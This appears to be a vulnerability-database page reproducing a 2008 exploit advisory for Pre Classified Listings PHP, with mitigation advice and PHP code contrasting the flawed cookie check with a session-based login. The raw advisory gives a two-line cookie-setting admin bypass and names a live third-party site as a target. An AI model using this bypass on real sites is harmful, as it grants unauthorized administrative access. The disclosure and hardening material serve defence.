Vendor: Pre Classified Listings PHP
By: G4N0K
CVSS: 7.5 (HIGH)
Vulnerability: Insecure Cookie Handling
CWE: 264
Product Name: Pre Classified Listings PHP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Pre Classified Listings PHP Insecure Cookie Handling

Pre Classified Listings PHP (version not specified) is vulnerable to insecure cookie handling: the admin panel treats the client-supplied adminname and adminid cookies as proof of authentication instead of a server-side session. An attacker can exploit this by setting both cookie values to admin, which grants access to the admin panel without any credentials.

Mitigation:

Do not treat client-supplied cookie values such as adminname and adminid as proof of identity; a browser can set them to anything. Authenticate the administrator against stored credentials and keep the resulting identity in a server-side session referenced only by an unguessable session identifier, checked on every admin request. In addition, ensure the session cookie is set with the Secure and HttpOnly flags.
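The following PHP is an added illustration of the pattern the advisory describes next to a hardened replacement; it is not code from Pre Classified Listings PHP, whose source is not on this page, and the function, file and variable names are assumptions.

```php
<?php
// Added example, not the product's own code. The "before" function is a
// reconstruction of the pattern the advisory describes; names are assumed.

// BEFORE (vulnerable pattern): the admin panel takes the presence and
// value of client-supplied cookies as proof of authentication. Any
// browser can set these cookies, so no password is ever needed.
function is_admin_insecure(): bool
{
    return isset($_COOKIE['adminname'], $_COOKIE['adminid'])
        && $_COOKIE['adminname'] === 'admin'
        && $_COOKIE['adminid'] === 'admin';
}

// AFTER (hardened): identity lives in a server-side session that is only
// populated after a real credential check. The browser holds nothing but
// an unguessable session id; a client-side adminname=admin cookie has no
// effect because the server never reads it.
function start_secure_session(): void
{
    session_set_cookie_params([
        'httponly' => true,   // not readable from document.cookie
        'secure'   => true,   // only sent over HTTPS
        'samesite' => 'Strict',
    ]);
    session_start();
}

function login_admin(string $user, string $password, array $admins): bool
{
    // $admins maps username => password_hash() output (assumed storage).
    if (!isset($admins[$user]) || !password_verify($password, $admins[$user])) {
        return false;
    }
    session_regenerate_id(true);   // new id after login: defeats fixation
    $_SESSION['admin_user'] = $user;
    return true;
}

function is_admin_secure(): bool
{
    return isset($_SESSION['admin_user']);
}

// Guard placed at the top of every admin page (login.php is hypothetical).
start_secure_session();
if (!is_admin_secure()) {
    header('Location: login.php');
    exit;
}
```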

Exploit-DB raw data:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                              IN THE NAME OF ALLAH
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Pre Classified Listings PHP Insecure Cookie Handling
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

[~] Script:          Pre Classified Listings PHP version
[~] Language:        PHP
[~] Website[main]:   http://www.preproject.com
[~] Website[script]: http://www.preproject.com/pclphp.asp
[~] Type:            Commercial
[~] Report-Date:     05/11/2008
[~] Founder:         G4N0K <mail.ganok[at]gmail.com>

===============================================================================

===[ Insecure Cookie Handling ]===
Admin Panel: http://localhost/[path]/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";

===[ LIVE ]===
Admin Panel: http://www.hostnomi.net/classi/admin/
[0] javascript:document.cookie = "adminname=admin";
[1] javascript:document.cookie = "adminid=admin";

===[ Greetz ]===
[~] ALLAH
[~] Tornado2800 <Tornado2800[at]gmail.com>
[~] Hussain-X <darkangel_g85[at]yahoo.com>

//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
//ALLAH,forgimme...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
exit(); //EoX
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# milw0rm.com [2008-11-05]